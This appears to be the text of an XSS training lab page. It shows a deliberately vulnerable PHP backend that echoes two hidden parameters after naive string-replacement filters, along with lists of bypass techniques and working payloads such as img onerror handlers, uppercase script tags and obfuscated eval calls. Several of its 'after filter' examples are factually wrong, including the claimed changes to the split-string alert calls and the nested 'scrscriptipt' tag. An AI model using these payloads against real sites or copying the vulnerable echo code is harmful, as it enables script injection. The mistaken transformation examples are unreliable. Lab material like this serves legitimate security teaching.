Advanced Filtering XSS Lab

Test XSS with complex transformation filters

Advanced Filtering Challenge

Lab Overview

This lab demonstrates advanced filtering techniques with different transformation approaches for different parameters, creating a complex security testing environment.

Multiple Filter Types: This application uses different filtering strategies for different parameters, including string replacement with transformations.
Hidden Parameters: There are multiple hidden parameters not shown in the main form. Use tools like Arjun to discover them!
# use arjun tool to find hidden parameter
Parameter Filtering Methods:
Secure fname, lname - Uses htmlspecialchars()
Transformation color - Replaces 'script' with 'alert'
Function Filter categoryid - Replaces dialog functions with '/'
Complex Multiple transformation filters
Filter Transformations:
Parameter Input Example After Filter Transformation
color <script>alert(1)</script> <alert>alert(1)</alert> 'script' → 'alert'
categoryid alert(1);confirm(2);prompt(3) /(1);/(2);/(3) 'alert','confirm','prompt' → '/'
Filter Complexity: Advanced Transformation Filters

Objective: Test XSS payloads against the advanced transformation filters and find ways to exploit the filter behavior to execute JavaScript.

Backend Source Code 
if(isset($_GET["fname"]) && isset($_GET["lname"])){
    echo htmlspecialchars($_GET["fname"], ENT_QUOTES);
    echo htmlspecialchars($_GET["lname"], ENT_QUOTES);
}
elseif(isset($_GET["color"])){
    $re = str_replace('script', 'alert', $_GET['color']);
    echo $re;
}
elseif(isset($_GET["categoryid"])){
    $arr = array('alert','confirm','prompt');
    $re = str_replace($arr, '/', $_GET['categoryid']);
    echo $re;
}
# use arjun tool to find hidden parameter
Test Input Forms
Visible Parameters (HTML Encoded)
This parameter uses htmlspecialchars() encoding
This parameter uses htmlspecialchars() encoding
Hidden Parameters
Hint: The 'color' and 'categoryid' parameters are not shown in the main form but are implemented in the backend with advanced filtering.
This parameter replaces 'script' with 'alert'
This parameter replaces 'alert','confirm','prompt' with '/'
Advanced Bypass Techniques
Color Parameter Bypasses:
  • Exploit transformation: Use payloads that become valid after 'script' → 'alert'
    • <script>prompt(1)</script><alert>prompt(1)</alert>
    • Try using 'script' in contexts where it becomes useful after transformation
  • Case variation: Use <SCRIPT>, <Script>
  • Alternative tags: Use <img>, <svg>, <body>
Category ID Parameter Bypasses:
  • Alternative functions: Use console.log, document.write, print
  • Function obfuscation:
    • window['al'+'ert'](1)
    • eval('al'+'ert(1)')
    • Function('al'+'ert(1)')()
  • Exploit replacement: Use payloads where '/' creates valid syntax
Creative Exploitation Techniques:
  • Double transformation: Create payloads that work after both transformations
  • Context switching: Use different execution contexts (HTML, JavaScript, CSS)
  • Encoding: Use HTML entities, Unicode, or Base64 encoding
  • Template literals: Use JavaScript template literals for dynamic execution
Security Implications

Advanced filtering demonstrates:

  • Transformation filters can create new attack vectors
  • Multiple filter types increase complexity but not necessarily security
  • String replacement can be exploited to create valid payloads
  • Context-aware filtering is more effective than simple replacements
  • Complex filters can create false sense of security
  • Proper output encoding is still the most reliable defense
Best Practices

For secure web applications:

  • Use context-aware output encoding instead of transformations
  • Implement strict Content Security Policy (CSP) headers
  • Validate input using strict whitelists, not blacklists
  • Use modern sanitization libraries (DOMPurify, etc.)
  • Avoid transformation filters that can be exploited
  • Conduct comprehensive security testing with various payloads
  • Use security headers: X-XSS-Protection, X-Content-Type-Options
Payload Examples for Advanced Filters
Color Parameter Payloads:
  • <script>prompt(1)</script> → becomes <alert>prompt(1)</alert>
  • <scrscriptipt>alert(1)</scrscriptipt> → becomes <alert>alert(1)</alert>
  • <SCRIPT>alert(1)</SCRIPT> → remains unchanged (case-sensitive)
  • <img src=x onerror=alert(1)> → remains unchanged
Category ID Parameter Payloads:
  • console.log(1) → remains unchanged
  • window['al'+'ert'](1) → becomes window['/'+'/'](1)
  • eval('al'+'ert(1)') → becomes eval('/'+'/(1)')
  • document.write('<script>alert(1)</script>') → becomes document.write('<script>/(1)</script>')
Creative Exploitation Payloads:
  • Combined exploitation: Payloads that work across both filters
  • Context-based: Payloads that work in specific execution contexts
  • DOM-based: Payloads that leverage DOM manipulation
  • Event-based: Payloads that use event handlers without blocked functions